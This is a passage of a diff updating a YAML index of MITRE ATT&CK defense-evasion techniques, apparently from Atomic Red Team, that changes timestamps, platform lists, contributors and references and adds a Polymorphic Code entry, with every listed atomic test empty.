       name: 'Hide Artifacts: Hidden Users'
       x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -8361,7 +8466,6 @@ defense-evasion:
       - 'User Account: User Account Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.002
     atomic_tests: []
   T1134.003:
@@ -8425,11 +8529,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.940Z'
       name: 'Impair Defenses: Impair Command History Logging'
       description: "Adversaries may impair command history logging to hide commands
         they run on a compromised system. Various command interpreters keep track
@@ -8514,12 +8617,11 @@ defense-evasion:
         url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1562.003
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -8594,45 +8696,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.002:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
-      type: attack-pattern
-      created: '2020-03-06T21:04:12.454Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.002
-        url: https://attack.mitre.org/techniques/T1497/002
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Sans Virtual Jan 2016
-        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
-        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
-          Evasion Techniques. Retrieved April 17, 2019.
-      - source_name: Unit 42 Sofacy Nov 2018
-        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
-        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
-          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
-      - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
-        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
-          LNK. Retrieved April 24, 2017.
-        source_name: FireEye FIN7 April 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.050Z'
       name: User Activity Based Checks
       description: "Adversaries may employ various user activity checks to detect
         and avoid virtualization and analysis environments. This may include changing
@@ -8656,6 +8723,9 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'User activity-based checks will likely occur in the first
         steps of an operation but may also occur throughout as an adversary learns
         the environment. Data and events should not be viewed in isolation, but as
@@ -8666,9 +8736,14 @@ defense-evasion:
         processes being spawned that gather a variety of system information or perform
         other forms of Discovery, especially in a short period of time, may aid in
         detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -8678,8 +8753,35 @@ defense-evasion:
       - Static File Analysis
       - Signature-based detection
       - Host forensic analysis
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+      created: '2020-03-06T21:04:12.454Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/002
+        external_id: T1497.002
+      - source_name: FireEye FIN7 April 2017
+        description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+          LNK. Retrieved April 24, 2017.
+        url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+      - source_name: Unit 42 Sofacy Nov 2018
+        description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+          Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+        url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+      - source_name: Sans Virtual Jan 2016
+        description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+          Evasion Techniques. Retrieved April 17, 2019.
+        url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1134.004:
     technique:
@@ -8736,7 +8838,7 @@ defense-evasion:
         Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
 
         Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-03T02:15:42.360Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Access Token Manipulation: Parent PID Spoofing'
       x_mitre_detection: |-
@@ -8761,7 +8863,6 @@ defense-evasion:
       - Host Forensic Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.004
     atomic_tests: []
   T1055.014:
@@ -8832,7 +8933,7 @@ defense-evasion:
         resources, and possibly elevated privileges. Execution via VDSO hijacking
         may also evade detection from security products since the execution is masked
         under a legitimate process.  "
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-07-07T17:09:09.048Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: VDSO Hijacking
       x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -8859,11 +8960,10 @@ defense-evasion:
       - Application control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -8917,7 +9017,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1574.013:
     technique:
@@ -8953,7 +9052,7 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -8979,8 +9078,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1542.004:
     technique:
@@ -9006,7 +9103,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -9028,8 +9125,6 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1218.001:
     technique:
@@ -9095,12 +9190,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.001
     atomic_tests: []
   T1070.005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-13T17:15:56.948Z'
       name: 'Indicator Removal on Host: Network Share Connection Removal'
       description: 'Adversaries may remove share connections that are no longer useful
         in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -9155,7 +9249,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.005
     atomic_tests: []
   T1562.001:
@@ -9303,7 +9396,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.001
     atomic_tests: []
   T1601:
@@ -9330,7 +9422,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:47.635Z'
       name: Modify System Image
       description: |-
         Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.  On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -9365,8 +9457,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574:
     technique:
@@ -9432,7 +9522,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.005:
     technique:
@@ -9458,7 +9547,7 @@ defense-evasion:
         Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
 
         A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:07:48.062Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Indicator Removal from Tools
       x_mitre_detection: The first detection of a malicious tool may trigger an anti-virus
@@ -9483,11 +9572,10 @@ defense-evasion:
       - Signature-based detection
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -9504,7 +9592,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -9514,7 +9601,7 @@ defense-evasion:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -9523,19 +9610,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -9583,11 +9668,12 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -9655,18 +9741,17 @@ defense-evasion:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1564.009:
@@ -9713,7 +9798,7 @@ defense-evasion:
         Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)
 
         Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:10:23.890Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Resource Forking
       x_mitre_detection: "Identify files with the <code>com.apple.ResourceFork</code>
@@ -9735,7 +9820,6 @@ defense-evasion:
       - Gatekeeper
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027:
     technique:
@@ -9810,6 +9894,7 @@ defense-evasion:
       - 'Script: Script Execution'
       - 'File: File Creation'
       - 'Module: Module Load'
+      - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'File: File Metadata'
       - 'Process: OS API Execution'
@@ -9869,12 +9954,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -9903,24 +9987,26 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -9955,9 +10041,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.001:
     technique:
@@ -9980,7 +10063,7 @@ defense-evasion:
         url: https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/
         description: Vest, J. (2017, October 9). Borrowing Microsoft MetaData and
           Signatures to Hide Binary Payloads. Retrieved September 10, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-02-10T19:52:47.724Z'
       name: Invalid Code Signature
       description: |-
         Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)
@@ -9998,8 +10081,6 @@ defense-evasion:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.006:
     technique:
@@ -10038,7 +10119,7 @@ defense-evasion:
         description: Johann Rehberger. (2020, September 23). Beware of the Shadowbunny
           - Using virtual machines to persist and evade detections. Retrieved September
           22, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T22:21:59.708Z'
       name: Run Virtual Instance
       description: |-
         Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
@@ -10081,10 +10162,78 @@ defense-evasion:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.006
     atomic_tests: []
+  T1027.014:
+    technique:
+      modified: '2024-10-09T18:56:28.092Z'
+      name: Polymorphic Code
+      description: "Adversaries may utilize polymorphic code (also known as metamorphic
+        or mutating code) to evade detection. Polymorphic code is a type of software
+        capable of changing its runtime footprint during code execution.(Citation:
+        polymorphic-blackberry) With each execution of the software, the code is mutated
+        into a different version of itself that achieves the same purpose or objective
+        as the original. This functionality enables the malware to evade traditional
+        signature-based defenses, such as antivirus and antimalware tools.(Citation:
+        polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
+        with polymorphic code to accomplish the intended effects, including using
+        mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
+        [Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
+        File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
+        polymorphic-medium)\n"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
+      - TruKno
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Application Log: Application Log Content'
+      - 'File: File Creation'
+      - 'File: File Metadata'
+      x_mitre_defense_bypassed:
+      - Signature-based Detection
+      type: attack-pattern
+      id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
+      created: '2024-09-27T12:28:03.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1027/014
+        external_id: T1027.014
+      - source_name: polymorphic-blackberry
+        description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
+          27, 2024.
+        url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
+      - source_name: polymorphic-sentinelone
+        description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
+          and Challenges. Retrieved September 27, 2024.
+        url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
+      - source_name: polymorphic-medium
+        description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
+          Retrieved September 27, 2024.'
+        url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
+      - source_name: polymorphic-linkedin
+        description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
+          and hindering analysis: Packing up and unpacking stuff. Retrieved September
+          27, 2024.'
+        url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1134.005:
     technique:
       x_mitre_platforms:
@@ -10128,7 +10277,7 @@ defense-evasion:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -10153,8 +10302,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1599:
@@ -10185,7 +10332,7 @@ defense-evasion:
         Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
 
         When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021)  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:05:44.200Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Boundary Bridging
       x_mitre_detection: |-
@@ -10204,7 +10351,6 @@ defense-evasion:
       - System Access Controls
       x_mitre_attack_spec_version: 2.1.0
